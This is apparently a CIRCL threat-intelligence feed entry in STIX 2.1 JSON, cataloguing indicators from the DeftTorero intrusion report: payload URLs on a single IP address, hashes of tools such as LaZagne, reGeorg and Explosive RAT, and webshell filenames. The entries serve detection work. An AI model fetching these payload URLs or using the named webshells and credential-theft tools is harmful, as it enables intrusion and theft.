misp-circl-feed/feeds/circl/stix-2.1/2e7a515f-c380-4915-a505-9568ccc00d22.json

1705 lines
No EOL
72 KiB
JSON

{
"type": "bundle",
"id": "bundle--2e7a515f-c380-4915-a505-9568ccc00d22",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-06T08:15:44.000Z",
"modified": "2022-10-06T08:15:44.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--2e7a515f-c380-4915-a505-9568ccc00d22",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-06T08:15:44.000Z",
"modified": "2022-10-06T08:15:44.000Z",
"name": "DeftTorero: tactics, techniques and procedures of intrusions revealed",
"published": "2022-10-24T09:21:12Z",
"object_refs": [
"indicator--36fff9ba-3e97-45f2-abd3-b720b7020d4d",
"indicator--e4ae6f13-41ef-4955-9eb5-cf7f7ee45373",
"indicator--8e2e035f-ff9d-48c2-8760-31a59f7a4d07",
"indicator--c8b20fa5-8fb5-4a8d-b69c-c9bc7c0b142a",
"indicator--6eb65ccf-abf8-4d91-8b13-9e13234e3b4c",
"indicator--87f605fa-69e0-4035-952e-024d3a1760be",
"indicator--747cf011-44fb-4e11-b299-2a71603ccb94",
"indicator--210ee4ac-7c7a-4d54-875a-312a3503a755",
"indicator--1cc4cabd-03f9-40b4-a5b7-fee8af302390",
"indicator--db592c3e-86e5-49f5-b93f-c8c877eabc60",
"indicator--231b1d67-7f41-4ca5-9d9f-15142756b299",
"indicator--13b201a9-7228-48f4-89fa-8ae9e3316287",
"indicator--559f1c1b-5ea9-4cb7-8635-eff4b0dbff67",
"indicator--3c5b75f1-ab87-4271-ba98-d89820fdba9b",
"indicator--bda5859a-ba78-49c8-824c-bc5453f43747",
"x-misp-object--1a66ee6b-c9bc-4567-b3c8-85592349e44e",
"indicator--a973cd15-c719-4c43-baed-389d38f35d95",
"indicator--fdb14fbf-8855-4433-86a4-7f37d4dc298a",
"indicator--525451ee-62dd-43d8-a8b7-55abd922adc7",
"indicator--c06eacaa-7f97-4d84-99e5-a52624bde69a",
"indicator--9b5e4f23-aaa3-4904-8697-8ffb60580067",
"indicator--d2de8e0f-ac72-47d1-8de8-f4843d91970d",
"indicator--2adbdbd0-5cf9-4142-bc43-0bf7ff1c890d",
"indicator--5bfc7b92-0962-44ee-a4ed-d5640e1cd6a1",
"indicator--d992ce91-b710-4f38-ac8c-36e6183d1543",
"indicator--c4fc319e-0659-4a8a-8cbb-18b2eba56ac1",
"indicator--f41e258b-608d-49e7-b38b-df2321e2fe0d",
"indicator--c0ec7d82-7d12-42dc-aeca-0a21eabe33c9",
"indicator--1045be6d-0c9d-4997-a98d-47f5d32951e0",
"indicator--78aeb5df-c2ab-48b7-86f9-9c9c7b19e2eb",
"indicator--85e8cf0d-dafa-40cc-a12c-888b92dd5b85",
"indicator--053265c5-7ab7-40e2-a284-9cb688db0db7",
"indicator--b56e1f1f-c63e-44f3-beed-7efc71b29f0a",
"indicator--6e306200-9536-48d8-ba02-fb7bc6210e93",
"indicator--0c4e1b7d-9d9a-4fbd-979b-20b4e2a9656d",
"indicator--f3aa997e-9b85-4bea-b0ea-a3c25bfdf334",
"indicator--94382d57-bf2b-4230-a0b4-5a4a13d61322",
"indicator--3290ec45-3315-4cd8-a44a-7b193b3c0e73",
"indicator--e6d4afb9-8f17-4616-bf11-e2811c4027e4",
"x-misp-object--e77a5eb2-08b5-4318-a5f2-919b36810acf",
"x-misp-object--c0f056c7-8f46-459a-be27-b44adc75712f",
"x-misp-object--335630e4-b15a-4580-ba4b-397949f9a27a",
"x-misp-object--a2155916-623b-49d9-95f3-0efa3b8c30b7",
"x-misp-object--115e07f7-3a2b-454a-9739-d258ea48c461",
"x-misp-object--74aba723-d4a6-4ac1-aeef-1ecc3bce0e59",
"x-misp-object--4244f8ac-02b4-4e7e-952a-2a5fc074f498",
"x-misp-object--ce69179a-198c-4251-818b-738836cbc598",
"x-misp-object--ce6570c7-2cf4-4b21-9d83-46553a2ffb96",
"x-misp-object--aad0eb86-0f69-43ad-8160-19fd3db38e7c",
"x-misp-object--b860e3a1-79ca-42bb-bc9e-8eeb0f6afd78",
"x-misp-object--ce6c6d09-48d0-4943-8373-e05933066fdd",
"x-misp-object--a7185faa-c1ad-404f-baa6-a05ecd72d479",
"x-misp-object--5a7223b0-b85e-42cb-a17e-648697e05301",
"x-misp-object--7caec62a-520f-40f8-9d8c-f8b1f9b6a691",
"x-misp-object--eaa69f57-9a50-486e-a02b-43e7f5d138ef",
"x-misp-object--afb5a5bf-5cd9-45e9-b96d-85cce8e11854",
"x-misp-object--58a63b89-307c-4545-95a2-179cb9fd844a",
"x-misp-object--28a158a4-784a-47ca-a1b6-af05a6f0c7a4"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"osint:source-type=\"technical-report\"",
"cccs:malware_classification=\"webshell\"",
"cert-ist:malware_type=\"Webshell\"",
"type:OSINT",
"osint:lifetime=\"perpetual\"",
"osint:certainty=\"50\"",
"misp-galaxy:malpedia=\"MimiKatz\"",
"misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
"misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
"misp-galaxy:tool=\"Mimikatz\"",
"misp-galaxy:tool=\"Netcat\"",
"misp-galaxy:mitre-intrusion-set=\"Volatile Cedar - G0123\"",
"misp-galaxy:threat-actor=\"Volatile Cedar\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--36fff9ba-3e97-45f2-abd3-b720b7020d4d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T12:55:01.000Z",
"modified": "2022-10-04T12:55:01.000Z",
"pattern": "[url:value = 'http://200.159.87.196:3306/jsJ13j.sct']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T12:55:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--e4ae6f13-41ef-4955-9eb5-cf7f7ee45373",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T12:55:01.000Z",
"modified": "2022-10-04T12:55:01.000Z",
"pattern": "[url:value = 'http://200.159.87.196/made.xn--ps1-to0a']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T12:55:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--8e2e035f-ff9d-48c2-8760-31a59f7a4d07",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T12:55:01.000Z",
"modified": "2022-10-04T12:55:01.000Z",
"pattern": "[url:value = 'http://200.159.87.196/av.xn--vbs-to0a']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T12:55:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--c8b20fa5-8fb5-4a8d-b69c-c9bc7c0b142a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T12:55:01.000Z",
"modified": "2022-10-04T12:55:01.000Z",
"pattern": "[url:value = 'http://200.159.87.196/1.msi']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T12:55:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--6eb65ccf-abf8-4d91-8b13-9e13234e3b4c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T12:55:01.000Z",
"modified": "2022-10-04T12:55:01.000Z",
"pattern": "[file:hashes.SHA256 = 'f0e6510103deefce338777a81cbfb7529eefa69bafad0d6fd63b4944f916c076']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T12:55:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--87f605fa-69e0-4035-952e-024d3a1760be",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T12:55:01.000Z",
"modified": "2022-10-04T12:55:01.000Z",
"description": "HackTool:Win32/LaZagne",
"pattern": "[file:hashes.SHA256 = 'ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T12:55:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--747cf011-44fb-4e11-b299-2a71603ccb94",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T12:55:01.000Z",
"modified": "2022-10-04T12:55:01.000Z",
"description": "HackTool:JS/ReGeorg",
"pattern": "[file:hashes.SHA256 = 'c1f43b7cf46ba12cfc1357b17e4f5af408740af7ae70572c9cf988ac50260ce1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T12:55:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--210ee4ac-7c7a-4d54-875a-312a3503a755",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T12:55:01.000Z",
"modified": "2022-10-04T12:55:01.000Z",
"description": "Trojan:Win32/Pynamer.B!ac",
"pattern": "[file:hashes.SHA256 = 'b42725211240828ccc505d193d8ea5915e395c9f43e71496ff0ece4f72e3e4ab']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T12:55:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--1cc4cabd-03f9-40b4-a5b7-fee8af302390",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T12:55:01.000Z",
"modified": "2022-10-04T12:55:01.000Z",
"description": "TEL:SCPT_LCSuspiPSPattern35",
"pattern": "[file:hashes.SHA256 = 'a16bdcfa4cc73f87f6eea9795acb75b6b40f80e0bba6394b39f37b7b1fd1f4ad']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T12:55:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--db592c3e-86e5-49f5-b93f-c8c877eabc60",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T12:55:01.000Z",
"modified": "2022-10-04T12:55:01.000Z",
"pattern": "[file:hashes.SHA256 = '8737f06d7374ff54a9ad728f53c09f89070beca02a305f11fc1e26c8fb33f049']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T12:55:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--231b1d67-7f41-4ca5-9d9f-15142756b299",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T13:57:37.000Z",
"modified": "2022-10-04T13:57:37.000Z",
"description": "Explosive RAT EXE",
"pattern": "[file:hashes.MD5 = '53ee31c009e96d4b079ebe3267d0ae8e']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T13:57:37Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--13b201a9-7228-48f4-89fa-8ae9e3316287",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T13:57:37.000Z",
"modified": "2022-10-04T13:57:37.000Z",
"description": "Explosive RAT EXE",
"pattern": "[file:hashes.MD5 = '54ebc45137ba5b9f5ece35ca40267100']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T13:57:37Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--559f1c1b-5ea9-4cb7-8635-eff4b0dbff67",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T13:57:37.000Z",
"modified": "2022-10-04T13:57:37.000Z",
"description": "Explosive RAT EXE",
"pattern": "[file:hashes.MD5 = 'a955b45e14d082f71e01ebc52cf13db8']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T13:57:37Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3c5b75f1-ab87-4271-ba98-d89820fdba9b",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T13:57:37.000Z",
"modified": "2022-10-04T13:57:37.000Z",
"description": "Explosive RAT EXE",
"pattern": "[file:hashes.MD5 = 'e952ec767d872ea08d8555cbc162f3dc']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T13:57:37Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--bda5859a-ba78-49c8-824c-bc5453f43747",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T13:57:37.000Z",
"modified": "2022-10-04T13:57:37.000Z",
"description": "Explosive RAT EXE",
"pattern": "[file:hashes.MD5 = 'ed50613683b5a4196e0d5fd2687c56da']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T13:57:37Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--1a66ee6b-c9bc-4567-b3c8-85592349e44e",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:52.000Z",
"modified": "2022-10-05T09:35:52.000Z",
"labels": [
"misp:name=\"report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "link",
"object_relation": "link",
"value": "https://otx.alienvault.com/pulse/633acb17ed56f34d3779a9a4",
"category": "External analysis",
"uuid": "49f85d63-6572-408d-8617-a1b94cf303b5"
},
{
"type": "link",
"object_relation": "link",
"value": "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
"category": "External analysis",
"uuid": "49032ca0-1735-4250-acaf-cfe07fba999b"
},
{
"type": "text",
"object_relation": "type",
"value": "Online",
"category": "Other",
"uuid": "68f89fe7-3c76-4085-8841-26168b11c786"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "report"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--a973cd15-c719-4c43-baed-389d38f35d95",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-04T14:02:11.000Z",
"modified": "2022-10-04T14:02:11.000Z",
"description": "basic ASPX webshell",
"pattern": "[file:hashes.MD5 = '0a45de1cdf39e0ad67f5d88c730b433a' AND file:name = 'cmd.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-04T14:02:11Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--fdb14fbf-8855-4433-86a4-7f37d4dc298a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:33.000Z",
"modified": "2022-10-05T09:35:33.000Z",
"description": "Tunna webshell",
"pattern": "[file:hashes.MD5 = '0d6bc7b184f9e1908d4d3fe0a7038a1e' AND file:name = 'c.aspx/conn.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--525451ee-62dd-43d8-a8b7-55abd922adc7",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:33.000Z",
"modified": "2022-10-05T09:35:33.000Z",
"description": "ASPX webshell",
"pattern": "[file:hashes.MD5 = 'c87a206a9c9846a2d1c3537d459ec03a' AND file:name = 'the.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--c06eacaa-7f97-4d84-99e5-a52624bde69a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:33.000Z",
"modified": "2022-10-05T09:35:33.000Z",
"description": "Devel webshell",
"pattern": "[file:hashes.MD5 = '02bcd71a4d7c3a366eff733f92702b81' AND file:name = 'devel.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9b5e4f23-aaa3-4904-8697-8ffb60580067",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:33.000Z",
"modified": "2022-10-05T09:35:33.000Z",
"description": "reGeorg webshell\r\n",
"pattern": "[file:hashes.MD5 = 'd6a82b866f7f9e1e01bf89c3da106d9d' AND file:name = 'Banner.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d2de8e0f-ac72-47d1-8de8-f4843d91970d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:33.000Z",
"modified": "2022-10-05T09:35:33.000Z",
"description": "webshell",
"pattern": "[file:hashes.MD5 = 'c59870690803d976014c7c8b58659ddf' AND file:name = '03831a5291724ef2060127f19206eiab.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--2adbdbd0-5cf9-4142-bc43-0bf7ff1c890d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:33.000Z",
"modified": "2022-10-05T09:35:33.000Z",
"description": "Caterpillar webshell",
"pattern": "[file:hashes.MD5 = '1ed9169bed85efb1fd5f8d50333252d8' AND file:name = 'aram.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5bfc7b92-0962-44ee-a4ed-d5640e1cd6a1",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:33.000Z",
"modified": "2022-10-05T09:35:33.000Z",
"description": "Caterpillar webshell",
"pattern": "[file:hashes.MD5 = '2d804386de4073bad642dfc816876d08' AND file:name = 'Pavos.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d992ce91-b710-4f38-ac8c-36e6183d1543",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:32.000Z",
"modified": "2022-10-05T09:35:32.000Z",
"description": "ASPX webshell\r\n",
"pattern": "[file:hashes.MD5 = '523aa999b9270b382968e5c24ab6f9eb' AND file:name = 'Report_21.jpg']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--c4fc319e-0659-4a8a-8cbb-18b2eba56ac1",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:32.000Z",
"modified": "2022-10-05T09:35:32.000Z",
"description": "ASPXSpy webshell",
"pattern": "[file:hashes.MD5 = '45d854e66631e5c1cda6dbf4fea074ce' AND file:name = 'aspxspy2014final.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f41e258b-608d-49e7-b38b-df2321e2fe0d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:32.000Z",
"modified": "2022-10-05T09:35:32.000Z",
"description": "Sec4ever webshell\r\n",
"pattern": "[file:hashes.MD5 = 'bb767354ee886f69b4ab4f9b4ac6b660' AND file:name = 'sec4ever.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--c0ec7d82-7d12-42dc-aeca-0a21eabe33c9",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:32.000Z",
"modified": "2022-10-05T09:35:32.000Z",
"description": "basic ASPX webshell",
"pattern": "[file:hashes.MD5 = '0152de452f92423829e041af2d783e3f' AND file:name = 'editor.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--1045be6d-0c9d-4997-a98d-47f5d32951e0",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:32.000Z",
"modified": "2022-10-05T09:35:32.000Z",
"description": "devilzshell webshell\r\n",
"pattern": "[file:hashes.MD5 = '7981f1bf9b8e5f4691e4ac440f1ba251' AND file:name = 'devilzshell.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--78aeb5df-c2ab-48b7-86f9-9c9c7b19e2eb",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:32.000Z",
"modified": "2022-10-05T09:35:32.000Z",
"description": "Nightrunner webshell",
"pattern": "[file:hashes.MD5 = '4b646e7958e1bb00924b8e6598fe6670' AND file:name = 'nightrunner.aspx']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--85e8cf0d-dafa-40cc-a12c-888b92dd5b85",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T09:35:32.000Z",
"modified": "2022-10-05T09:35:32.000Z",
"description": "PHP webshell\r\n",
"pattern": "[file:hashes.MD5 = 'd608163a972f43cc9f53705ed6d31089' AND file:name = 'mini.php']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T09:35:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"cert-ist:malware_type=\"Webshell\"",
"cccs:malware_classification=\"webshell\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--053265c5-7ab7-40e2-a284-9cb688db0db7",
